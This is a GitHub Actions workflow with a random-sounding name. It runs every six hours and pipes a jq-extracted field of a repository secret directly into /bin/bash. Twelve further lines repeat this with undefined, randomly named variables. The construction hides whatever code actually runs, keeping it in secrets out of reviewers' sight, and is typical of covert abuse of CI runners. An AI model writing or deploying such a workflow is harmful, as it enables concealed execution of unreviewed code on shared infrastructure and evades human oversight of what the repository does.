name: numberfreethrow
on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: numberfreethrow
        env:
          tf95: ${{ secrets.tf95 }}
        run: |
          echo $tf95 | jq -r .vd99459 | /bin/bash
          echo $xgucu094 | jq -r .k04 | /bin/bash
          echo $zfrvf5866 | jq -r .lcmk40330 | /bin/bash
          echo $xen9 | jq -r .is30 | /bin/bash
          echo $cux3 | jq -r .pidji62573 | /bin/bash
          echo $yxygf99 | jq -r .ccgf3 | /bin/bash
          echo $rrcbf6 | jq -r .zke8339 | /bin/bash
          echo $cdqm26134 | jq -r .ous992 | /bin/bash
          echo $xkzvq81 | jq -r .dpdiz51768 | /bin/bash
          echo $yqtea942 | jq -r .vjfbr504 | /bin/bash
          echo $vg43649 | jq -r .nm93717 | /bin/bash
          echo $wztqf2284 | jq -r .otpli48381 | /bin/bash
          echo $b31 | jq -r .fcvls73 | /bin/bash

